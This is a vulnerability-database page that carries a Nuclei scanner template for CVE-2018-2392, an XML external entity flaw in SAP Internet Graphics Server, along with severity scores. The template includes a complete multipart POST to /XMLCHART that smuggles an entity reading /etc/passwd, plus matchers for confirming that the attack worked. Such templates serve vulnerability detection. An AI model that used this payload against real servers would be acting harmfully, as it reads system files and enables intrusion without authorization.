Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-2392
HistoryJul 05, 2021 - 4:40 p.m.

SAP Internet Graphics Server (IGS) - XML External Entity Injection

2021-07-0516:40:37
ProjectDiscovery
github.com
16
sap
internet graphics server
xxm external entity injection
cve
vulnerabilities
security patches

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

AI Score

7.8

Confidence

High

EPSS

0.003

Percentile

68.4%

SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
id: CVE-2018-2392

info:
  name: SAP Internet Graphics Server (IGS) - XML External Entity Injection
  author: _generic_human_
  severity: high
  description: |
    SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or a complete system compromise.
  remediation: |
    Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. Additionally, ensure that the SAP Internet Graphics Server (IGS) is not exposed to untrusted networks or the internet.
  reference:
    - https://launchpad.support.sap.com/#/notes/2525222
    - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/
    - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/
    - https://troopers.de/troopers18/agenda/3r38lr/
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2018-2392
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2018-2392
    cwe-id: CWE-611
    epss-score: 0.00278
    epss-percentile: 0.64901
    cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: internet_graphics_server
  tags: cve,cve2018,sap,igs,xxe,xmlchart,msf,intrusive

http:
  - raw:
      - |
        POST /XMLCHART HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary={{randstr_1}}

        --{{randstr_1}}
        Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml"
        Content-Type: application/xml

        <?xml version='1.0' encoding='UTF-8'?>
            <ChartData>
              <Categories>
                <Category>ALttP</Category>
              </Categories>
              <Series label="{{randstr_4}}">
                <Point>
                  <Value type="y">12345</Value>
                </Point>
              </Series>
            </ChartData>
        --{{randstr_1}}
        Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml"
        Content-Type: application/xml

        <?xml version='1.0' encoding='UTF-8'?>
            <!DOCTYPE Extension [<!ENTITY xxe SYSTEM "/etc/passwd">]>
            <SAPChartCustomizing version="1.1">
              <Elements>
                <ChartElements>
                  <Title>
                    <Extension>&xxe;</Extension>
                  </Title>
                </ChartElements>
              </Elements>
            </SAPChartCustomizing>
        --{{randstr_1}}--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Picture
          - Info
          - /output/
        condition: and

      - type: word
        part: body
        words:
          - ImageMap
          - Errors
        condition: or

      - type: word
        part: header
        words:
          - text/html
          - SAP Internet Graphics Server
        condition: and

      - type: status
        status:
          - 200

# file name - /etc/passwd
# digest: 4a0a004730450220783900a664b801e4124580348a1a341bbe95faa45d04a00f1fea200d08ef82c3022100fb5d0eca0ce43e53f102a93a9c3805364c2562124f021a18a78bdb23ff033e6b:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

AI Score

7.8

Confidence

High

EPSS

0.003

Percentile

68.4%